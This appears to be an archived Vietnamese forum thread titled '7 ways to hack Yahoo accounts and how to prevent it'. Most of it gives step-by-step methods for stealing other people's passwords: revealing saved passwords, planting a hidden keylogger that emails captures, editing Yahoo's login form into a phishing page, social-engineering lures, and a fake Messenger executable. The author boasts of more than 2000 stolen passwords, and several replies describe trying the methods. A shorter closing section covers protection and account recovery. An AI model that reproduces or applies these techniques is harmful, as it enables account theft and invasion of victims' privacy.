Diễn đàn tuổi trẻ Uhm Vietnam - 7 Cách hack nick yahoo và cách phòng tránh

Diễn đàn tuổi trẻ Uhm Vietnam

Phiên bản đầy đủ: 7 Cách hack nick yahoo và cách phòng tránh
Bạn đang xem phiên bản rút gọn. Xem phiên bản đầy đủ với định dạng thích hợp.
Dạo này thấy anh em hay bị hack pass yahoo,tiêu biểu như là anh Tranvanvi và gần đây nhất là chị kem_vista nay mình xin post bài sau để anh em biết mà phòng tránh.Bài viết được sưu tầm từ nhiều nguồn.
Cách1: Bạn đi chat và đã bao giờ để ý đến dòng Remember my ID & Password trong trang Login của YM chưa? Có rất nhiều người khi đi chat hay check dòng đó, YM sẽ lưu lại ID & Password của họ chỉ cần sử dụng phần mềm Caption It là bạn có thể dịch được cái dòng password **** đó. Vậy download phần mềm đó ở đâu? Bạn có thể down nó ngay trong trang sau http://dear.to trong mục Download. Thế còn sử dụng nó hê...hê dễ như ăn cháo vậy .Sau khi down nó về bạn sẽ thấy nó chỉ có duy nhất một file bạn chạy file đó rồi di chuột đến dòng password cần dịch password sẽ hiện ra trong box.

*Cách2: Cách này thì có lẽ ít bạn để ý đến, đó là bạn sẽ làm cho windown tự động lưu lại ID & password mà chẳng thèm để ý xem nạn nhân có đồng ý hay không. Người khác có thể vào xem thư mà chẳng cần biết ID lẫn password, Windown sẽ lưu password vào file *.PWL trong Windown/System và chỉ cần dùng phần mềm ToolPWL là sẽ biết được passsword. Để làm điều đó bạn hãy vào Internet Explorer chọn Tools--> Internet Options...-->Chọn tag Content---> Auto Complete...--->đánh dấu chọn User name & password on form và Prompt me to save passwords. Vậy là windown sẽ lưu lại password mà chẳng thèm hỏi han gì cả.


*Cách3: Cách này sử dụng phần mềm KeyLogger5.0, chức năng của nó là ghi lại tất cả những gì nạn nhân đánh ở bàn phím ID, password...tất tần tật. Nó lại còn có thể chụp lại màn hình sau khoảng thời gian mà bạn định sẵn nữa chứ- nó có chế độ tự huỷ theo ngày mà bạn chọn. Tất cả mọi thứ sẽ được lưu lại và gửi về email cho bạn chỉ cần email của bạn có hỗ trợ pop chẳng hạn như hotmail- còn yahoo thì hết free lâu rồi. Bạn chỉ cần download nó về chạy nó ở bất cứ đâu bạn có thể dâu nó ở một chỗ mà nạn nhân khó phát hiện nhất- sau đó bạn setting cho nó, cái này cũng chẳng khó khăn gì nếu bạn đã từng xài bomb mail thì setting cho cái này cũng tương tự thôi. Bạn cũng có thể cài mật khẩu để chỉ một mình bạn sử dụng được mà thôi. Mà cái quan trọng là mấy "anh chàng vệ sĩ" Anti_Virus hay Trojan Remove chẳng thể phát hiện nổi nó. Thế download nó ở đâu? Vâng hãy vào trang chủ http://dear.to/mytrung vào mục Download để down nó về. Vậy thì làm thế nào để biết máy mình có dính nó không? Bạn hãy đặt chế độ "firewall" cho NAV để khi có file gửi đi nó sẽ thông báo cho bạn biết, nếu bạn thấy nghi ngờ hãy vào Star-->Seach để tìm xem có mặt nó hay không nếu có thì delete nó đi là xong.


*Cách4: Cách này chúng ta sẽ tạo một trang giao diện giống Yahoo Mail để khi nạn nhân check mail thì password sẽ gửi về hộp thư cuả bạn. Làm sao để tạo đây hê...hê hãy yên tâm bạn chẳng cần biết chút gì về thiết kế web cũng có thể làm được. Đầu tiên bạn hãy vào http://mail.yahoo.com sau đó chọn menu File-->Save AS để ghi trang đó lại, hãy nhớ xem bạn ghi lại ở đâu nhé! Bây giờ hãy mở Notepad ra ( Star/Programs File/Accessories/Notepad). Chọn File/Open để mở trang Yahoo Mail bạn vừa ghi ra, bạn tìm đến dòng sau : <FORM name=login_form onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action=https://login.yahoo.com/config/login?c17b5e bqs944v method=post autocomplete="off"> Bạn hãy sửa nó lại như sau: <FORM method="post" action="maito:địa chỉ email của bạn"> Ví dụ: email của tui là jerry_khung@yahoo.com thì dòng đó sẽ là action="jerry_khung@yahoo.com" Xong xuôi bạn chọn Save để ghi lại.Tìm đến nơi bạn ghi file Yahoo Mail đó click chuột phải vào chọn Send to-->Desktop.File đó sẽ được đưa ra màn hình, bạn hãy rename nó cho hấp dẫn chút kiểu kiểu như: "Yahoo Mail" hay "Check Mail" chẳng hạn... giờ thì ngồi chờ để xem có "gà" nào check mail không là OK! He..he..


*Cach 5 : Trước khi nói đến cách này thì xin được gửi lời xin lỗi đến các bạn đã làm theo Cách 2 trong bài "lấy password email yahoo" ở trang chủ. Mình không có ý định lừa để lấy pass của ai cả mà chỉ muốn cho các bạn biết đó cũng là một cách hack. Hiệu quả của nó ư? Hê..hê bằng cách đó mình lấy được hơn 2000 password email. Cũng chỉ vì nhóc Hope$un post cách đó bên hackervn mà thư cứ gửi về lườm lượp, lại còn lên cả báo Sinh viên Viêt Nam nữa chứ. Ho..ho Nào bạn hãy đăng ký 1 địa chỉ email Yahoo đại loại như Showmepassword@yahoo, return_pass@yahoo, hay lookup_pass@yahoo... chẳng hạn, sau đó dụ victim giống như mình đã làm các bạn có thể dựa vào đó... !


*Cấch 6 Cách này chúng ta sẽ tạo một face giống Yahoo Messenger để khi victim đi chat, nhập ID & Password thì nó sẽ lưu lại. Đầu tiên bạn cần down YahooFace trong mục download ở trang chủ, giải nén nó bạn sẽ có 2 file: yahoo.mdb và YPager.exe. Bạn hãy copy file yahoo vào ổ C:\, tiếp đến bạn copy file YPager đến thư mục cài đặt Yahoo Messenger thường thì nó nằm ở C:\Programs Files\Yahoo\Messenger, trước khi paste file YPager bạn lên rename file YPager có trước trong đó thành YPager1 chẳng hạn sau đó đưa nó ra màn hình để khi login vào face Yahoo của mình không được thì victim có thể chọn cái shortcut đó để vào Yahoo Messenger một cách bình thường , rồi paste file YPager mà bạn vừa down về, vậy là xong rồi đó khi nạn nhân login thì ID & Password vào file yahoo.mdb, để xem bạn hãy chạy file YPager click vào nút Search rồi đánh vào password login123 để xem danh sách các nạn nhân, để lấy được file yahoo.mdb bạn có thể sử dụng phần mềm Stealmail để nó gửi về mail cho bạn.

Trước tiên mình sẽ nói cách các hacker lấy password của bạn.
Phising hay còn gọi là để trang web yahoo giả:
Cách này là cách rất hay phổ biến các hacker dùng để lấy password yahoo của bạn song hiện giờ yahoo đã cải tiến bẳng hệ thống SSL (secure socket layer) sau đây có ảnh minh họa về site yahoo giả và yahoo thật đã được đính ảnh để nhận biết. Cái này ai dùng máy ở nhà nên cài hình ảnh hay chữ gì vào để nhận biết.Còn nếu bạn ở hàng thì cố nhìn kỹ xem trên góc trái đăng ký nó có cái vạch tròn tròn mờ nhạt màu bạc để nhận biết trang yahoo xịn và yahoo đểu

Trojan và virus :
Họ gửi virus hay trojan qua một cái link nào đó hoặc trực tiếp gửi qua Yahoo messenger.Cách này các bạn có thể chống bằng các phần mềm tường lửa có chế độ bảo vệ chat IM như mình hiện dùng là Zonealarm Suite mới nhất. Có lần có người định gửi file mã hóa(encrypted) đã bị tường lửa phát hiện và disconnect YM luôn vì thấy nguy hiểm.Còn bình thường nó sẽ tự del bất kỳ link nào mà nó ghi là virus. Nói cho tóm lại nếu cái link nào thoát thì các bạn cũng đừng có click vô làm chi.Không nên click vô bất cứ link nào ai gửi cho bạn vì máy ở hàng cafe ở VN toàn dính virus.
Keylogger:
Cài này thì do một ngừoi bạn IT cho biết rằng họ có thể làm một cái keylogger rồi gửi cho bạn nếu bạn click vô thì những gì bạn gõ nó sẽ ghi lại và gửi về chủ nhân.Cái này là dạng theo dõi bạn gõ gì trên bàn phìm rồi ghi lại.Nếu bạn không click vô bất cứ link nào ai gửi cho thì sẽ thoát.
Cuối cùng nếu do đen đủi hay lơ đãng bạn chót bị xơi mất nàng yahô @ccount thì bạn hãy làm theo phương pháp sau để lấy lại password.Cách lấy còn tùy thuộc vào trình độ hack của hacker kia. Nếu như bạn phát hiện sớm hacker kia chưa kịp thay đổi account information bạn nhiều thì bạn hãy đến trang yahoo.mail.com và click vào phần khai báo forgot password.Ở đây bạn cần khai báo ngày,tháng,năm sinh cái này thì không ai có thể thay đổi được bởi yahoo đã khóa nó lại,zip (mã vùng ) và nước bạn khai báo ban đầu.Các bạn làm email nhớ để ý khi đăng ký.Nếu quên có thể vào myaccount ở blog hay yahoo mail để xem lại.Hãy ghi lại nó nhé. Sau khi khai báo song chọn cái bên trái ghi nick yahoo id bạn vào và click ok. Nó sẽ hiện ra hai phương pháp để gửi password mới cho bạn. Cái đầu tiên nếu bạn trả lời câu hỏi secret mà bạn khi đăng ký nó sẽ hiện lên trang web đó cái password mới (cái này lá chắc nhất bởi khi bạn bị hack đa số thông tin email thứ hai của bạn đã bị thay đổi).Cai thứ hai là gửi pass vào email thứ hai khi bạn đăng ký (alternative email). Cái này áp dụng cho những chú hacker lơ tơ mơ chưa kịp thay đổi account information của bạn,
Nhưng đối với các hacker xịn thì khi ăn cắp nick bạn họ sẽ thay đổi toàn bộ account detail của bạn đặc biệt cái zip code và tên nước bạn khai báo như vậy bạn sẽ không thể áp dụng cách trên được. Vậy hãy áp dụng theo cách này bạn vào trang yahoo để báo abuse: Click here. Bạn khai báo những gì bạn biết cho họ, ghi rõ ràng và chi tiết rằng nick yahoo bạn là gì đã bị hack và khai thêm chi tiết trên như là ngay,tháng,năm sinh của account đó,câu hỏi bí mật và câu trả lời,zip code khi khai báo,nước khi khai báo. Sau khi khai báo email mới cho họ để họ liên lạc và gửi đi.Đảm bảo ngày hôm sau bạn sẽ nhận thư trả lời của họ và cách hướng dẫn bạn lấy lại nick.Khi bạn khai ngày,tháng,năm sinh và câu hỏi và câu trả lời bí mật thì họ sẽ biết chắc đó là account của bạn và sẽ giúp bạn lấy lại nhanh hơn.Còn nếu họ chậm bạn hãy gửi email lại cho họ để xin số điện thoại và gọi thẳng cho họ nếu bạn cảm thấy cái yahoo đó có nhiều tin tức riêng tư mà bạn muốn nhanh chóng được giải quyết sớm.Bạn nào ở nước ngòai gọi thì rẻ và tiện lợi chỉ cần tiếng anh khá khai báo đúng là ôi cha cái nàng @ đã trở về bên ta.Còn ở VN thì hơi mắc một tí nhưng nếu bạn cảm thấy cần thiết thì gọi cho nhanh còn không thì cứ email là cũng sẽ được thôi. Đó là cách để lấy em @ trở về bên cạnh nếu bạn chot lỡ mất,cho dù hacker có siêu đến mấy thì họ cũng kô thể biết ngày tháng năm sinh bạn khai ở account và càng kô biết câu hỏi bí mật và trả lời bí mật, chính hai cái này sẽ giúp bạn lấy lại em @ của bạn....Kekekek
Banner bản thân
thú vị đấy....
hack vào mồm ak vỡ alo đấy
bác nào hack đii Smile)
hay quá......................
Nhge có vẻ là để hack nick yahoo rất là dễ
Đang thử làm theo cách 2 mà chưa kiếm được cái tool ToolPWL
hack nick có vẻ dễ dàng vậy ư
ai có ToolPWL share cho mình với, kiếm mãi mà không thấy
Vào quán nét setting trước xong ngồi đợi con mồi Wink). Thú vị đấy!